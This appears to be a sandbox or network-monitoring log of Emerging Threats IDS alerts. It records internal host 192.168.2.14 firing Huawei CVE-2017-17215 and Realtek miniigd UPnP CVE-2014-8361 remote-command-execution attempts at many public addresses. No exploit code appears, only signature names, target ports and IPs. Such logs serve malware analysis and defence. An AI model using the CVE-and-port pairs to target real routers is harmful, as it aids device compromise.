                                                07/20/24-23:05:39.054227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5157437215192.168.2.14157.35.9.79
                                                07/20/24-23:05:59.834038TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3712252869192.168.2.14138.178.254.97
                                                07/20/24-23:06:00.736310TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4511452869192.168.2.14210.75.205.158
                                                07/20/24-23:05:48.795527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4610637215192.168.2.1419.53.75.198
                                                07/20/24-23:05:57.207276TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614988852869192.168.2.14198.11.216.157
                                                07/20/24-23:05:59.834038TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26047252869192.168.2.14169.23.32.227
                                                07/20/24-23:05:45.051106TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613783452869192.168.2.1423.67.93.22
                                                07/20/24-23:05:58.104584TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3378052869192.168.2.14220.66.34.165
                                                07/20/24-23:05:42.131789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4553637215192.168.2.14197.179.141.156
                                                07/20/24-23:05:50.555898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5920837215192.168.2.1441.22.194.170
                                                07/20/24-23:06:00.209942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3280852869192.168.2.1465.118.0.140
                                                07/20/24-23:06:00.426771TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5646052869192.168.2.1463.220.62.243
                                                07/20/24-23:05:46.119639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5422837215192.168.2.1441.204.151.43
                                                07/20/24-23:05:48.795527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6061037215192.168.2.14157.73.158.138
                                                07/20/24-23:05:47.086079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4628637215192.168.2.1496.86.134.95
                                                07/20/24-23:06:12.712041TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3953252869192.168.2.1466.78.27.114
                                                07/20/24-23:06:19.603798TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614342652869192.168.2.1435.37.174.94
                                                07/20/24-23:05:57.974933TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3579252869192.168.2.1413.149.201.70
                                                07/20/24-23:06:01.180750TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616065052869192.168.2.14168.167.96.130
                                                07/20/24-23:06:08.756759TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613696052869192.168.2.14150.183.16.234
                                                07/20/24-23:05:52.468494TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3433652869192.168.2.1486.103.97.76
                                                07/20/24-23:05:57.342606TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25866852869192.168.2.14112.83.97.45
                                                07/20/24-23:06:02.442542TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4382252869192.168.2.14122.129.207.148
                                                07/20/24-23:05:35.544209TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4281052869192.168.2.1480.130.32.22
                                                07/20/24-23:05:33.830570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4349437215192.168.2.1441.146.165.184
                                                07/20/24-23:06:15.141369TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5324052869192.168.2.14192.174.164.210
                                                07/20/24-23:06:08.328920TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3815652869192.168.2.14201.226.14.177
                                                07/20/24-23:06:02.167898TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3830252869192.168.2.1477.217.131.179
                                                07/20/24-23:06:19.742051TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5867452869192.168.2.1465.30.47.252
                                                07/20/24-23:05:42.245589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3432037215192.168.2.1441.57.48.10
                                                07/20/24-23:06:06.465385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4041637215192.168.2.14157.138.206.123
                                                07/20/24-23:05:58.997188TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24084252869192.168.2.14152.29.165.10
                                                07/20/24-23:05:59.125247TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614152052869192.168.2.14210.222.196.155
                                                07/20/24-23:05:59.204161TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5465252869192.168.2.14116.220.0.95
                                                07/20/24-23:05:56.421312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5922637215192.168.2.14157.12.215.59
                                                07/20/24-23:06:08.268005TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615200252869192.168.2.14149.251.169.133
                                                07/20/24-23:06:42.331305TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24211652869192.168.2.14189.34.115.204
                                                07/20/24-23:05:38.953817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3296837215192.168.2.1441.49.10.35
                                                07/20/24-23:05:40.455250TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4605452869192.168.2.1491.111.129.197
                                                07/20/24-23:05:50.515352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3884837215192.168.2.1444.218.162.144
                                                07/20/24-23:06:02.080862TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615007452869192.168.2.14195.241.37.9
                                                07/20/24-23:06:02.766400TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3413652869192.168.2.1424.169.159.85
                                                07/20/24-23:05:48.763323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3285037215192.168.2.14197.119.79.35
                                                07/20/24-23:07:03.190386TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4158852869192.168.2.1449.63.100.161
                                                07/20/24-23:06:19.575886TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4192052869192.168.2.1482.36.97.169
                                                07/20/24-23:05:57.841404TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613863852869192.168.2.14211.66.122.221
                                                07/20/24-23:05:36.528872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4158237215192.168.2.1447.179.50.213
                                                07/20/24-23:05:58.954116TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24621652869192.168.2.1447.88.146.78
                                                07/20/24-23:05:52.499861TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25113052869192.168.2.14166.212.7.50
                                                07/20/24-23:07:34.305255TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5198252869192.168.2.14149.123.144.134
                                                07/20/24-23:05:35.201041TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615071652869192.168.2.141.200.111.50
                                                07/20/24-23:05:42.245589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3606437215192.168.2.1441.254.204.37
                                                07/20/24-23:06:02.906267TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613505252869192.168.2.149.213.251.239
                                                07/20/24-23:06:32.610183TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614641052869192.168.2.1424.123.84.203
                                                07/20/24-23:06:03.453957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5407437215192.168.2.14111.84.153.82
                                                07/20/24-23:05:36.045135TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614905852869192.168.2.1477.237.114.164
                                                07/20/24-23:05:37.556779TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25052252869192.168.2.1477.237.114.164
                                                07/20/24-23:07:15.790678TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615536852869192.168.2.14128.39.139.203
                                                07/20/24-23:05:35.922674TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614629852869192.168.2.1435.159.139.53
                                                07/20/24-23:05:57.594101TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23408452869192.168.2.14221.233.85.98
                                                07/20/24-23:06:05.658836TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3942852869192.168.2.1442.223.143.55
                                                07/20/24-23:06:04.290200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4840052869192.168.2.14156.92.82.212
                                                07/20/24-23:06:08.736347TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3387452869192.168.2.1497.212.42.191
                                                07/20/24-23:05:55.877930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5595037215192.168.2.1425.104.136.33
                                                07/20/24-23:05:45.435096TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4450837215192.168.2.14157.26.209.11
                                                07/20/24-23:05:47.948716TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4232252869192.168.2.14139.27.203.218
                                                07/20/24-23:05:56.066947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4112437215192.168.2.1441.204.206.44
                                                07/20/24-23:05:35.429320TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5397052869192.168.2.14181.62.64.51
                                                07/20/24-23:06:03.476247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4021037215192.168.2.14197.49.59.104
                                                07/20/24-23:06:44.280800TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4433452869192.168.2.1473.67.230.39
                                                07/20/24-23:05:38.945198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4282237215192.168.2.14137.40.254.9
                                                07/20/24-23:06:13.612988TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24798652869192.168.2.1482.244.199.195
                                                07/20/24-23:07:08.217282TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4705852869192.168.2.1434.151.91.57
                                                07/20/24-23:05:47.385927TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4888652869192.168.2.1469.202.5.98
                                                07/20/24-23:06:00.746219TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25278052869192.168.2.14173.224.217.200
                                                07/20/24-23:05:57.587244TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4762452869192.168.2.1498.41.122.243
                                                07/20/24-23:05:58.789977TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4326052869192.168.2.1441.15.209.124
                                                07/20/24-23:06:27.858951TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4076852869192.168.2.14126.244.235.71
                                                07/20/24-23:05:35.722490TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5367252869192.168.2.1417.184.234.0
                                                07/20/24-23:05:58.094268TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4261052869192.168.2.1441.15.209.124
                                                07/20/24-23:05:38.645534TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5306452869192.168.2.1439.183.105.121
                                                07/20/24-23:05:40.322260TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3969452869192.168.2.14122.165.176.151
                                                07/20/24-23:05:40.433285TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23702252869192.168.2.1450.3.84.134
                                                07/20/24-23:06:02.893558TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25962852869192.168.2.14147.97.158.170
                                                07/20/24-23:06:01.287009TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5063852869192.168.2.14188.84.165.22
                                                07/20/24-23:05:37.455022TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4604052869192.168.2.14125.249.246.55
                                                07/20/24-23:05:33.829338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3280437215192.168.2.1494.44.111.34
                                                07/20/24-23:05:45.435096TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4325037215192.168.2.1470.188.242.239
                                                07/20/24-23:06:00.698150TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615335652869192.168.2.14116.220.0.95
                                                07/20/24-23:06:09.635095TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6060452869192.168.2.144.21.2.155
                                                07/20/24-23:05:35.540920TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613490652869192.168.2.1439.204.207.21
                                                07/20/24-23:05:57.811976TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614229652869192.168.2.14129.180.128.160
                                                07/20/24-23:06:04.523323TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4674652869192.168.2.14114.84.217.191
                                                07/20/24-23:06:06.107642TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4320052869192.168.2.1412.208.13.200
                                                07/20/24-23:06:50.419958TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5080852869192.168.2.1418.124.2.70
                                                07/20/24-23:05:52.502843TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6089652869192.168.2.14194.100.123.200
                                                07/20/24-23:05:59.081357TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5964652869192.168.2.1470.188.135.27
                                                07/20/24-23:06:04.407221TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613594252869192.168.2.14142.127.232.36
                                                07/20/24-23:06:20.738854TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4296652869192.168.2.14129.201.169.136
                                                07/20/24-23:05:42.188277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3331837215192.168.2.1474.185.83.0
                                                07/20/24-23:05:50.559359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5954437215192.168.2.1441.214.127.96
                                                07/20/24-23:06:03.269499TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24740852869192.168.2.1478.217.58.236
                                                07/20/24-23:06:17.529212TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5510452869192.168.2.14143.84.11.112
                                                07/20/24-23:05:35.322897TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4907452869192.168.2.1489.113.83.91
                                                07/20/24-23:06:03.015672TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3916452869192.168.2.14197.202.109.233
                                                07/20/24-23:05:40.458812TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5752852869192.168.2.1458.46.182.160
                                                07/20/24-23:05:36.328888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3287437215192.168.2.1441.186.116.94
                                                07/20/24-23:05:48.788274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5831437215192.168.2.14200.251.248.110
                                                07/20/24-23:05:34.619289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4364437215192.168.2.14197.170.178.75
                                                07/20/24-23:05:45.414465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4883237215192.168.2.1441.184.132.220
                                                07/20/24-23:05:46.707199TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5360252869192.168.2.145.107.169.199
                                                07/20/24-23:06:01.048493TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4769852869192.168.2.14204.46.229.11
                                                07/20/24-23:05:50.542034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450237215192.168.2.1441.0.21.214
                                                07/20/24-23:05:40.342828TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25935452869192.168.2.1413.60.62.114
                                                07/20/24-23:05:57.171385TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5360252869192.168.2.1498.243.190.82
                                                07/20/24-23:05:33.857328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5504637215192.168.2.1424.82.183.93
                                                07/20/24-23:05:39.930490TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3685052869192.168.2.1473.48.25.59
                                                07/20/24-23:05:36.324524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3970437215192.168.2.1441.48.198.170
                                                07/20/24-23:06:20.681117TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616018452869192.168.2.14131.102.164.83
                                                07/20/24-23:05:47.101729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5515837215192.168.2.14157.42.35.121
                                                07/20/24-23:06:09.698680TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614379252869192.168.2.1419.121.240.220
                                                07/20/24-23:05:37.556779TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4171052869192.168.2.14198.163.171.175
                                                07/20/24-23:05:52.472911TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24589052869192.168.2.14184.100.90.131
                                                07/20/24-23:05:58.802333TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614327452869192.168.2.14184.54.140.200
                                                07/20/24-23:05:52.503773TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4579052869192.168.2.1461.177.161.149
                                                07/20/24-23:06:07.959908TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4667052869192.168.2.1417.95.5.182
                                                07/20/24-23:06:10.529848TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5997852869192.168.2.14144.88.71.215
                                                07/20/24-23:07:36.644546TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3448852869192.168.2.1436.138.112.150
                                                07/20/24-23:05:37.987250TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613452852869192.168.2.1425.203.5.43
                                                07/20/24-23:05:40.407056TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24649252869192.168.2.14114.248.97.56
                                                07/20/24-23:05:36.323629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4413037215192.168.2.14157.241.110.249
                                                07/20/24-23:05:45.435097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5784637215192.168.2.14157.250.253.113
                                                07/20/24-23:05:59.330840TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5865652869192.168.2.14183.146.251.234
                                                07/20/24-23:06:09.610263TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24797852869192.168.2.14198.60.250.215
                                                07/20/24-23:06:00.265687TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613340652869192.168.2.1453.149.94.192
                                                07/20/24-23:05:56.088545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5456237215192.168.2.1441.239.139.75
                                                07/20/24-23:05:47.809338TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3665852869192.168.2.14129.121.134.219
                                                07/20/24-23:06:18.564435TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5207852869192.168.2.1482.79.164.142
                                                07/20/24-23:06:23.212855TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5242452869192.168.2.14203.91.112.188
                                                07/20/24-23:05:57.550045TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615128452869192.168.2.14130.56.1.95
                                                07/20/24-23:06:01.244494TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614997852869192.168.2.1414.164.85.37
                                                07/20/24-23:05:58.378138TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25919852869192.168.2.1432.171.130.180
                                                07/20/24-23:05:58.983376TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23627852869192.168.2.14100.5.198.48
                                                07/20/24-23:05:59.404275TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5614852869192.168.2.14160.172.64.185
                                                07/20/24-23:07:04.068388TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3733452869192.168.2.14114.85.98.80
                                                07/20/24-23:05:34.626588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3676437215192.168.2.1441.74.40.186
                                                07/20/24-23:05:38.950380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4155237215192.168.2.14197.112.203.34
                                                07/20/24-23:05:46.521911TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4328252869192.168.2.14222.41.152.79
                                                07/20/24-23:05:58.087911TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3917252869192.168.2.14126.169.68.235
                                                07/20/24-23:05:34.626588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6099237215192.168.2.14197.47.178.20
                                                07/20/24-23:05:48.775023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5122437215192.168.2.1441.200.136.101
                                                07/20/24-23:06:01.593708TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614218252869192.168.2.14138.242.28.121
                                                07/20/24-23:06:06.855214TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23936852869192.168.2.1479.41.249.71
                                                07/20/24-23:06:05.144876TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4388652869192.168.2.1471.168.119.24
                                                07/20/24-23:05:48.762153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4413637215192.168.2.1441.209.81.98
                                                07/20/24-23:05:46.361141TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3923252869192.168.2.14155.93.230.5
                                                07/20/24-23:05:40.377377TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3581652869192.168.2.14139.117.217.229
                                                07/20/24-23:05:36.324524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4386637215192.168.2.1467.217.78.22
                                                07/20/24-23:05:45.447173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5253637215192.168.2.14197.24.23.238
                                                07/20/24-23:05:36.323623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3439237215192.168.2.1472.99.99.186
                                                07/20/24-23:05:56.079797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6080037215192.168.2.14157.37.77.50
                                                07/20/24-23:06:34.929510TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5079452869192.168.2.14205.207.74.168
                                                07/20/24-23:06:08.048662TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614299252869192.168.2.14129.23.253.0
                                                07/20/24-23:05:52.603344TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4700452869192.168.2.14223.10.185.52
                                                07/20/24-23:06:25.940016TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613523052869192.168.2.1460.28.102.104
                                                07/20/24-23:06:53.291407TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3362252869192.168.2.14143.92.41.114
                                                07/20/24-23:07:06.283235TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614958252869192.168.2.14126.27.65.104
                                                07/20/24-23:05:46.060827TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4615452869192.168.2.1441.126.157.26
                                                07/20/24-23:05:59.091812TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5684652869192.168.2.1479.208.10.184
                                                07/20/24-23:05:37.445004TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24425052869192.168.2.1419.45.76.169
                                                07/20/24-23:05:33.863090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3848037215192.168.2.14197.148.145.109
                                                07/20/24-23:05:38.732645TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4913852869192.168.2.149.176.88.108
                                                07/20/24-23:05:58.394422TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615676452869192.168.2.1413.58.163.5
                                                07/20/24-23:06:46.637280TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4758252869192.168.2.14166.26.188.195
                                                07/20/24-23:05:33.833027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3537637215192.168.2.14189.228.237.19
                                                07/20/24-23:05:46.516600TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5274052869192.168.2.1467.42.251.191
